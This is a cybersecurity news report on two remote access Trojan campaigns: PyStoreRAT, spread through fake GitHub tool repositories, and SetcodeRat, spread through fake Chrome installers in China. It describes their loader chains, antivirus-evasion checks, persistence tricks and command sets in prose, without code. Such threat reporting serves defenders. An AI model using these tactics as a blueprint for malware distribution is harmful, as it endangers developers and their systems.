Cybersecurity researchers are warning of a new campaign leveraging GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based remote access Trojan (RAT). PyStoreRAT.
“These repositories, often themed around development utilities or OSINT tools, contain just a few lines of code responsible for silently downloading a remote HTA file and running it via ‘mshta.exe,’” Morphisec researcher Yonatan Edri said in a report shared with The Hacker News.
PyStoreRAT is described as a “modular, multi-stage” implant that can run EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules. The malware also deploys a subsequent payload, an information stealing program known as Rhadamanthys.
The attack chain includes distributing malware via Python or JavaScript loader stubs embedded in GitHub repositories disguised as OSINT tools, DeFi bots, GPT wrappers, and security-themed utilities designed to appeal to analysts and developers.
The first signs of the campaign date back to mid-June 2025, and “repositories” have been steadily rolled out ever since. The tool is promoted through social media platforms such as YouTube and X, as well as artificially inflating a repository’s star and fork metrics. This is a technique reminiscent of Stargazers Ghost Network.
The attackers behind this campaign used newly created GitHub accounts, or accounts that had been dormant for months, to publish repositories and secretly leaked malicious payloads in the form of “maintenance” commits in October and November, after the tool started gaining popularity and appeared on GitHub’s top trending list.
In fact, many of the tools did not work as advertised, in some cases simply displaying static menus or non-interactive interfaces, while others performed minimal placeholder operations. The intent behind this operation was to feign legitimacy by abusing GitHub’s inherent trust and tricking users into running the loader stub responsible for starting the infection chain.
This effectively triggers the execution of a remote HTML application (HTA) payload to deliver the PyStoreRAT malware. This payload has the ability to profile the system, check for administrative privileges, and scan the system for cryptocurrency wallet-related files, particularly those related to Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02.
The loader stub collects a list of installed antivirus products and checks for strings matching “Falcon” (a reference to CrowdStrike Falcon) or “Reason” (a reference to Cybereason or ReasonLabs) to reduce visibility. If detected, ‘cmd.exe’ will launch ‘mshta.exe’. Otherwise, run “mshta.exe” directly.
Persistence is achieved by setting up a scheduled task that pretends to self-update NVIDIA apps. In the final stage, the malware connects to an external server to obtain commands to be executed on the host. Some of the supported commands are listed below.
- Download and run the EXE payload containing Rhadamanthys
- Download and unzip the ZIP archive
- It downloads a malicious DLL and executes it using ‘rundll32.exe’.
- Take raw JavaScript code and run it dynamically in memory using eval().
- Download and install the MSI package
- Spawns a secondary “mshta.exe” process to load additional remote HTA payloads.
- Run PowerShell commands directly in memory
- It spreads through removable drives by replacing legitimate documents with malicious Windows shortcut (LNK) files.
- Delete the scheduled task to remove the forensic trail
It is currently unclear who is behind the operation, but the presence of Russian language artifacts and coding patterns suggest an attacker likely of Eastern European origin, Morfisek said.
“PyStoreRAT represents a move towards modular, script-based implants that can adapt to security controls and provide multiple payload formats,” Edri concluded. “By using HTA/JS for execution, a Python loader for delivery, and Falcon-enabled evasion logic, it creates a stealthy first-stage scaffold that traditional EDR solutions can only detect late in the infection chain.”
The disclosure came as Chinese security vendor QiAnXin detailed another new remote access Trojan (RAT) codenamed SetcodeRat that has likely been propagating across the country through malvertising lures since October 2025. Hundreds of computers, including government and corporate computers, are said to have been infected over the course of a month.
“The malicious installation package first checks the victim’s region,” QiAnXin Threat Intelligence Center said. If you are from a non-Chinese area, it will end automatically.
The malware disguises itself as a legitimate installer for popular programs such as Google Chrome, and only advances to the next stage if the system language supports Mainland China (Zh-CN), Hong Kong (Zh-HK), Macau (Zh-MO), or Taiwan (Zh-TW). Execution will also terminate if the connection to the Bilibili URL (“api.bilibili(.)com/x/report/click/now”) fails.
The next step is to launch an executable called “pnm2png.exe”, sideload “zlib1.dll”, and decrypt and execute the contents of a file called “qt.conf”. The decrypted payload is a DLL that embeds the RAT payload. SetcodeRat can connect to Telegram or traditional command and control (C2) servers to obtain instructions and perform data theft.
This allows the malware to take screenshots, log keystrokes, read folders, configure folders, start processes, run cmd.exe, configure socket connections, collect system and network connection information, and update itself to new versions.
